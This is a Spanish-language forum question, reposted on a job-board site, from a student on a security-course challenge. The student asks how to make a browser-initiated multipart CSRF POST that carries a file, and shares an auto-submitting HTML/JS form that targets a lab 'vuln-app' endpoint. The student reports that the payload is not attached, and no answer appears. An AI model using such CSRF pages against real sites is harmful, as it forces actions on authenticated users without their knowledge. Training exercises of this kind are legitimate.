Business
Jobs
  • About Us
  • Solutions
    • Job Postings
      Post your job and receive qualified candidates in 48h.
    • Candidate Assessments
      500+ technical and psychological tests, plus anti-fraud.
    • Headhunting
      Tailor-made executive search from start to finish.
    • Payroll + EOR
      Payroll dispersal and EOR across 15+ LATAM countries.
  • Pricing
  • Jobs

0

193
Views
¿Es posible preestablecer Form POST Body (multipart) con Plain Javascript sin hacer Ajax/XHR o Fetch?

Actualmente estoy trabajando en un desafío de piratería en un curso de seguridad.

Se requiere hacer una solicitud POST multiparte/datos de formulario como un CSRF (engañar al usuario para que visite mi HTML/JS y redirigirla con una sesión autenticada para hacer algo dañino).

Como falta el encabezado Allow-Origins necesario, no es posible hacerlo con Ajax/XHR o Fetch.

Eso me deja con la pregunta: ¿Puedo agregar Formdata o algo similar a un formulario basado en DOM y enviarlo como un envío iniciado por navegador que evitará las restricciones de CORS?

Esta es mi idea inicial. La solicitud POST se ejecuta según lo previsto, pero la carga útil del archivo no se adjunta al cuerpo como debería.

 <html> <body> <form id="myForm" method="POST" action="http://vuln-app/api/v1/process" enctype="multipart/form-data"> <input type="file" id="fileinput"> <input type="submit" value="Submit request" /> </form> <script> yml = ` vulnerable yml code ` var ymlBlob = new Blob([yml], { type: "application/yml" }); form = document.forms[0]; var fd = new FormData(form); fd.append("fileinput", ymlBlob, "description.yml"); form.submit(); </script> </body> </html>
about 4 years ago · Juan Pablo Isaza
Answer question
Find remote jobs

Discover the new way to find a job!

Top jobs
Top job categories
Business
Post vacancy Pricing Sales
Legal
Terms and conditions Privacy policy
© 2026 PeakU Inc. All Rights Reserved.
Andres GPT
Show me some job opportunities
There's an error!